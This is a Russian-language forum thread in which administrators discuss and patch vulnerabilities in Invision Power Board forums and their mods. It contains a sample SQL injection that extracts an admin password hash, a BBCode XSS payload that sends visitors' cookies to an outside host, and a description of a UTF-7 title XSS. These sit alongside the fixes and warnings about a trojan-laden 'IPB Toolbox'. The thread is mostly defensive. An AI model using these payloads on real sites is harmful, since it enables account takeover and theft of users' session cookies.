Уязвимости форумов Invision Power Board

[kolorom]

В инвижне есть распространённый мод - галерея фоток, так вот в ней я обнаружил такую инъекцию:

при голосовании за фотку не фильтруется значение оценки. она подставляется в такой запрос-

Код:

 UPDATE ibf_gallery_images SET ratings_total=ratings_total+$rating,
ratings_count=ratings_count+1 WHERE id=266

 

здесь переменная $rating - это оценка, а id - номер картинки (он нам не пригодится) Вот. но что же можно сделать с запросом UPDATE?

В мискле начиная с версии 4.1 поддерживается подвыборка (sub select). то есть если мы подставим вместо оценки такой текст:

1, name=(select password from ibf_members where id=1)

то получится такой запрос:

 

Код:

 UPDATE ibf_gallery_images SET ratings_total=ratings_total+1,
name=(select password from ibf_members where id=1), 
ratings_count=ratings_count+1 WHERE id=266

 

ну это я для примера... вот так можно записать в название картинки хэш пароля юзера.

 

©coyl

 

 

Вот кстати заметил без автора идеи что приходят письма о ошибках мускула такого рода все связанно с оценками!!!

 

Database error in:
mySQL query error: UPDATE ibf_files SET votes = 10, total = 41 , rating = 4,1 WHERE id = '5'

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '1 WHERE id = '5'' at line 1

mySQL error number: 1064

Script URI: /forum/index.php?act=Downloads&do=rating&id=5&rate=5

 

Это происходит как и в галерее так и в модуле файлов 8(

 

Что делать

[dfc_darkman]

дык

это запрос напрямую к базе?

или через ссылку можно тако сделать?

[X@MиЛь]

мне сложно шас что то говорить. форум мой сломан. но я должен всех предостиреч от такойже проблемы. хакер написал как он сломал и как исправить дырку. делюс с вами друзья :

 

в sources/Login.php

 

Код $pid = $std->my_getcookie(pass_hash);

 

меняем на

 

$pid = (!preg_match(/^([0-9A-Za-z]){32}$/, $std->my_getcookie(pass_hash)))?$std->my_getcookie(pass_hash):"";

[nafigator]

Описание уязвимости и её решение было в этой теме.

Уязвимости форумов Invision Power Board

[Anna]

Дык написали же, что нет там восклицательного знака:

 

Verify мин нет

 

в sources/Login.php

 

 $pid = $std->my_getcookie('pass_hash');
меняем на
$pid = (preg_match('/^([0-9A-Za-z]){32}$/', $std->my_getcookie('pass_hash')))?$std->my_getcookie('pass_hash'):"";

<{POST_SNAPBACK}>

 

 

правильно ?

а вот это

$pid = (!preg_match(/^([0-9A-Za-z]){32}$/, $std->my_getcookie(pass_hash)))?$std->my_getcookie(pass_hash):"";

 

НЕ ПРАВИЛЬНО?

 

 

 

я правильно понимаю?

[Song]

Воск. знак не нужен.

[Anna]

А вот по этому поводу идеи есть:

Возможная дырка в безопасности

 

????

Изменено 29 Июня 2005 пользователем Anna

[seba]

пришла вот такая рекламка на мыло:

 

IPB Toolbox <ipbtoolbox@gmail.com>

 

Dear User,

 

I've finally decided to release my IPB Toolbox. With this program you can flood IPB boards in just a few clicks. It has several advanced features that

make it hard to detect and trace. It even works on most modded boards. Here's its feature list:

 

-Mass user registration

-Mass posting

-Arcade cheater

-Lots more

 

Link :

_http://www.ххх.org/ipbtoolbox/

 

Disclaimer:

This program was created for educational purposes only. The author is in no way responsible for what you chose to do with this program, or any damage

that you or this program causes.

 

Sincerely,

The IPB Toolbox Team

 

с ее помощью делают SQL-инъекции. форум 2.0.4, все обновления из этой темы ставил, и все равно смогли взломать.

адресс сайта могу дать, откуда можно качнуть эту утилю.

[Anna]

Я нашла в инете заметку, где написано НИ В КОЕМ СЛУЧАЕ не скачивать и не пробовать эту прогу на своем форуме, потому что эта прога отсылает какие-то данные своему разработчку о вашем форуме и о том как именно вы ее тестили.[1120477603:1120498361]Файло не качайте плз - там троян. Проверила касперским.

[Onic]

я вот это на форум слал у меня получилось на ипб 2.0

<{POST_SNAPBACK}>

тоже попробовал. но как увидеть получилось или нет?

все ссылки в БД по слову antichat вычистил на всякий случай.

Подскажите как определить способ по которому меня взломали, что бы обезопасить тебя. Версия IPB 2.0.3.

 

а днях появился новый пользователь с логином tugr|k, именно с символом "|". Он не сделал на форуме ниодной записи от себя, а лишь проголосовал в опросе (при создании опроса картинки не использовались, опция отключена).

А потом он начали писать из под логина админа. Когда я забанил логин tugr|k - это не помогло.

Угрожает что сможет уничтожыть форум и сайт.

в базе mySQL в его данных есть подозрительное отличие:

в таблице ibf_members в поле org_perm_id стояла цифра 5, которую я только что удалил.

Изменено 9 Июля 2005 пользователем Onic

[ghost46]

а что с этим то делать: http://antichat.ru/txt/utf7/

я 17 страниц перечитал и не нашел ответа блин((

[SAT]

[COLOR=[IMG=http://aaa.aa/=`aaa.jpg]]` style=background:url(javascript:document.images[68].src="http://site.ru/s.jpg?"+document.cookie) [/COLOR]

 

а я давно убил возможность подставлять любое кроме латинских букв

 

while( preg_match( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#is", $txt ) )
{
$txt = preg_replace( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#ies"  , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
}

 

Onic, поставь для спокоствия что ты завтра останешься админом http://www.ibresource.ru/db/435/

[Monah]

-SAT-

А в какой файл записывать и вместо чего, чтобы только "латинские" регились?

:7:

 

seba

Anna

Похищает файлы, содержащие настройки ниже перечисленных программ и сервисов:

* &RQ(IRQ)

* Becky! Internet Mail

* Cute FTP

* EDialer

* FAR (ftp plugin info)

* Microsoft Outlook

* Mirabilis ICQ

* Miranda ICQ

* Mozilla

* Opera

* The Bat!

* Total Commander

* Trillian Messenger

* WS_FTP

* Информация RAS службы Windows

Хороший атнивирь скачать файл не даст.

[Anna]

Да при чем тут антивирь? Эта прога - чистый развод для лохов, которые считают себя мега-хакерами, но сами ничего не пишут.

[SAT]

конечно же в post_paster.php

 

                        while ( preg_match( "#\[size=([^\]]+)\](.+?)\[/size\]#ies", $txt ) )
                       {
                               $txt = preg_replace( "#\[size=([^\]]+)\](.+?)\[/size\]#ies"    , "\$this->regex_font_attr(array('s'=>'size','1'=>'\\1','2'=>'\\2'))", $txt );
                       }

                       while ( preg_match( "#\[font=([^\]]+)\](.*?)\[/font\]#ies", $txt ) )
                       {
                               $txt = preg_replace( "#\[font=([^\]]+)\](.*?)\[/font\]#ies"    , "\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
                       }

                       while( preg_match( "#\[color=([^\]]+)\](.+?)\[/color\]#ies", $txt ) )
                       {
                               $txt = preg_replace( "#\[color=([^\]]+)\](.+?)\[/color\]#ies"  , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
                       }

 

заменить на

 

 	 while ( preg_match( "#\[size=([0-9]+)\](.+?)\[/size\]#is", $txt ) )
	 {
   $txt = preg_replace( "#\[size=([0-9]+)\](.+?)\[/size\]#ies"    , "\$this->regex_font_attr(array('s'=>'size','1'=>'\\1','2'=>'\\2'))", $txt );
	 }
 
	 while ( preg_match( "#\[font=([a-zA-Z]+)\](.*?)\[/font\]#is", $txt ) )
	 {
   $txt = preg_replace( "#\[font=([a-zA-Z]+)\](.*?)\[/font\]#ies"    , "\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt );
	 }
 
	 while( preg_match( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#is", $txt ) )
	 {
   $txt = preg_replace( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#ies"  , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt );
	 }

 

хотя можно и разрешить пользователям цвета вводить таким макаром #ff0000

 

тогда думаю что стоит в font и color заменить [a-zA-Z] на [a-zA-Z0-9\#] у меня юзеры ругались пришлось вот так сделать, но все равно опаска что возможны подводные камни, хотя текст который может содержать уязвимость и состоять из латиници, цифр и # не могу придумать[1120984561:1120984961]ЗЫ: WS_FTP Server дырявый как не знаю что... локальный пользователь может эксплотировать backdoor с помощью которого заставить выполнить локальное приложение с привилегиями системного процесса....

 

Да при чем тут антивирь? Эта прога - чистый развод для лохов, которые считают себя мега-хакерами, но сами ничего не пишут.

 

пожалуй правильное решение, просто не поддоваться на уловки мошенников и все...

[ghost46]

а что с этим то делать: http://antichat.ru/txt/utf7/

я 17 страниц перечитал и не нашел ответа блин((

<{POST_SNAPBACK}>

не мож кто напишет конкретно че с этим делать - я уже и поиск юзал и писал, а меня игнорят...

[Spear]

не мож кто напишет конкретно че с этим делать - я уже и поиск юзал и писал, а меня игнорят...

<{POST_SNAPBACK}>

извини, конечно.. но ты глупый что-ли?

во-первых в условиях тестирования в ИПБ 1.3 эта бага не даёт ничего.

во-вторых (текст со статьи античата):

Как видим, в странице указан метатег с кодировкой ISO-8859-1, что однозначно определяет кодировку страницы. Однако обратим внимание на то, что тег <title>, куда заносится тема текущего топика, находится перед метатегом (отмечено желтым). А это значит, учитывая описанные особенности парсинга, что если в тег title будет внедрен скрипт в кодировке UTF-7, то он будет раскодирован и выполнен. Таким образом, для проведения XSS атаки, достаточно создать в форуме тему, название которой будет зашифровано в кодировке UTF-7 и содержать вредоносный скрипт.

если до сих пор не дошло - обьясню.

 

НУЖНО ОТРЕДАКТИРОВАТЬ ШАБЛОНЫ И ВЫНЕСТИ ТЕГ <TITLE> НИЖЕ МЕТАТЕГА ОПРЕДЕЛЯЮЩЕГО КОДИРОВКУ.

 

сделать это очень "тяжело", именно поэтому тебе никто и не отвечал.

[ghost46]

извини что задел тебя своим вопросом...

[Spear]

извини что задел тебя своим вопросом...

<{POST_SNAPBACK}>

своим вопросом ты меня ничуть не задел. По твоему троеточию в конце поста могу подумать что я задел тебя своим ответом. Не плачь.

[Onic]

Подскажите как определить способ по которому меня взломали, что бы обезопасить тебя. Версия IPB 2.0.3.

 

а днях появился новый пользователь с логином tugr|k, именно с символом "|". Он не сделал на форуме ниодной записи от себя, а лишь проголосовал в опросе (при создании опроса картинки не использовались, опция отключена).

А потом он начали писать из под логина админа. Когда я забанил логин tugr|k - это не помогло.

Угрожает что сможет уничтожыть форум и сайт.

в базе mySQL в его данных есть подозрительное отличие:

в таблице ibf_members в поле org_perm_id стояла цифра 5, которую я только что удалил.

 

Сорри, что повторяюсь!

[-winux-]

Юзер этот может оказаться не при чем. Если форум 2.0.3. то скорее тебя поимели сплойтом от RST. Там просто SQL инъекция, выдающая хэш админа, который потом можно подставить в куки. Если хочешь - стучи в асю, помогу закрыть: 11177222

[Dekker]

нафига куда-то стучаться, если уязвимость фиксили здесь

 

Уязвимости форумов Invision Power Board

 

умным хотца быть, да ?

[X@MиЛь]

Люди тут куча нововведений. Даже не всё понятно. Стока дырок и их исправлений. Я тут подумал а почему бы IBResource не выпускать патч безопасности включающий в себя все эти заплатки. Это было бы просто супер! А так все 18 страниц нужно изучать и убивать целые дни что бы заделать все эти дырки

[Armad]

Ко мне в ркуи попал немного доработаный сплоит от рст, который позволяет получать хэш во всех версиях ипб, ВКЛЮЧАЯ 2.0.4. Сплоит в паблик выкладывать небуду, если кто-то из админов заинтересуется вышлю на мыло/аську/лс код для изучения.

[GiV]

Armad кидай...